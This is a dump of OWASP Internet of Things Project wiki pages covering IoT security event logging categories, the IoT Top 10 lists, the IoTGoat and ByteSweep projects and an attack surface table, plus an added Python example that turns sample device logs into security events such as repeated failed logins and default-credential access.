| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
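To show how the event list above turns into detection logic, here is an added Python example (not part of the IoT Event Logging Project) that reads constructed key=value device log lines and emits events from four of the categories: Request Exceptions, Authentication Exceptions, Administrative Mode Events and Ecosystem Membership Exceptions. The log format, the sliding-window thresholds and the enrolled/disenrolled device inventory are assumptions made for the demo.<br />

```python
"""Turn raw device log lines into the security events the list above asks for.

Added example, not OWASP project code. Log format, thresholds and the device
inventory are assumptions; SAMPLE_LOG is constructed for the demo.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

ALLOWED_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS"}
WINDOW = timedelta(seconds=60)
FAILED_PASSWORD_THRESHOLD = 3   # failures per (src, user) inside WINDOW
LOGIN_RATE_THRESHOLD = 5        # any auth attempts per src inside WINDOW
ENROLLED = {"cam-0042", "cam-0043", "hub-0001"}   # assumed ecosystem inventory
DISENROLLED = {"cam-0007"}

KV_RE = re.compile(r"(\w+)=(\S+)")

# Constructed: one camera's log, key=value pairs after an ISO-8601 timestamp.
SAMPLE_LOG = """\
2019-11-01T07:00:01Z dev=cam-0042 src=10.0.0.7 type=http method=GET path=/login status=200
2019-11-01T07:00:02Z dev=cam-0042 src=10.0.0.7 type=auth user=admin result=fail
2019-11-01T07:00:03Z dev=cam-0042 src=10.0.0.7 type=auth user=admin result=fail
2019-11-01T07:00:04Z dev=cam-0042 src=10.0.0.7 type=auth user=admin result=fail
2019-11-01T07:00:05Z dev=cam-0042 src=10.0.0.7 type=auth user=admin result=fail
2019-11-01T07:00:06Z dev=cam-0042 src=10.0.0.7 type=auth user=admin result=ok
2019-11-01T07:00:10Z dev=cam-0042 src=10.0.0.7 type=http method=TRACE path=/ status=405
2019-11-01T07:00:11Z dev=cam-0042 src=192.168.1.9 type=auth user=admin result=ok cred=default
2019-11-01T07:00:12Z dev=cam-0042 type=peer peer=cam-0099 msg=heartbeat
2019-11-01T07:00:13Z dev=cam-0042 type=peer peer=cam-0007 msg=command
2019-11-01T07:00:14Z dev=cam-0042 type=peer peer=hub-0001 msg=heartbeat
"""


def parse_line(line: str) -> Tuple[datetime, Dict[str, str]]:
    ts_text, rest = line.split(" ", 1)
    return datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ"), dict(KV_RE.findall(rest))


class IoTEventDetector:
    """Stateful: sliding windows per source, so bursts are detected rather than single lines."""

    def __init__(self) -> None:
        self.failures: Dict[tuple, deque] = defaultdict(deque)
        self.attempts: Dict[str, deque] = defaultdict(deque)
        self.events: List[dict] = []

    @staticmethod
    def _push(window: deque, ts: datetime) -> int:
        window.append(ts)
        while ts - window[0] > WINDOW:
            window.popleft()
        return len(window)

    def _emit(self, ts: datetime, category: str, event: str, **detail: str) -> None:
        self.events.append({"ts": ts.isoformat(), "category": category, "event": event, **detail})

    def feed(self, line: str) -> None:
        ts, f = parse_line(line)
        kind = f.get("type")
        if kind == "http":
            if f.get("method") not in ALLOWED_METHODS:
                self._emit(ts, "Request Exceptions", "Attempt to Invoke Unsupported HTTP Method",
                           src=f.get("src", "?"), method=f.get("method", "?"))
        elif kind == "auth":
            src, user = f.get("src", "?"), f.get("user", "?")
            # == rather than >= so each burst raises exactly one event.
            if self._push(self.attempts[src], ts) == LOGIN_RATE_THRESHOLD:
                self._emit(ts, "Authentication Exceptions", "High Rate of Login Attempts", src=src)
            if f.get("result") == "fail":
                if self._push(self.failures[(src, user)], ts) == FAILED_PASSWORD_THRESHOLD:
                    self._emit(ts, "Authentication Exceptions", "Multiple Failed Passwords",
                               src=src, user=user)
            elif f.get("result") == "ok" and f.get("cred") == "default":
                self._emit(ts, "Administrative Mode Events",
                           "Device Accessed Using Default Administrative Credentials", src=src, user=user)
        elif kind == "peer":
            peer = f.get("peer", "?")
            if peer in DISENROLLED:
                self._emit(ts, "Ecosystem Membership Exceptions",
                           "Traffic Seen from Disenrolled System", peer=peer)
            elif peer not in ENROLLED:
                self._emit(ts, "Ecosystem Membership Exceptions",
                           "Traffic Seen from Unenrolled System", peer=peer)


def detect(log_text: str = SAMPLE_LOG) -> List[dict]:
    det = IoTEventDetector()
    for line in log_text.splitlines():
        if line.strip():
            det.feed(line)
    return det.events


if __name__ == "__main__":
    for e in detect():
        print(e)
```

Each burst raises one event because the counters are compared for equality with the threshold at the moment it is crossed; the "Multiple Failed Passwords" event fires on the third failure and "High Rate of Login Attempts" on the fifth attempt, even though the later login succeeded. A real deployment would forward these as structured records to a SIEM rather than keep them in memory, and would source the enrolled/disenrolled sets from the ecosystem's provisioning system.<br />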
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Event Logging Project? ==<br />
<br />
The IoT Event Logging Project provides a list of core events that should be logged by any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program, and companies that want to build one have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255834OWASP Internet of Things Project2019-10-31T15:06:40Z<p>Aaron.guzman: .</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects separated into the following categories - Seek & Understand, Validate & Test, and Governance.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT, including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants, whether you're a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with any Top 10 list, it should be used as a first step and expanded according to the IoT ecosystem being assessed. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with any Top 10 list, it should be used as a first step and expanded according to the IoT ecosystem being assessed. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project's goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities are based on the [[OWASP_Internet_of_Things_Project|OWASP IoT Top 10]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT firmware security analysis platform. It allows IoT device makers, large and small, to run fully automated security checks against firmware before they ship it.<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
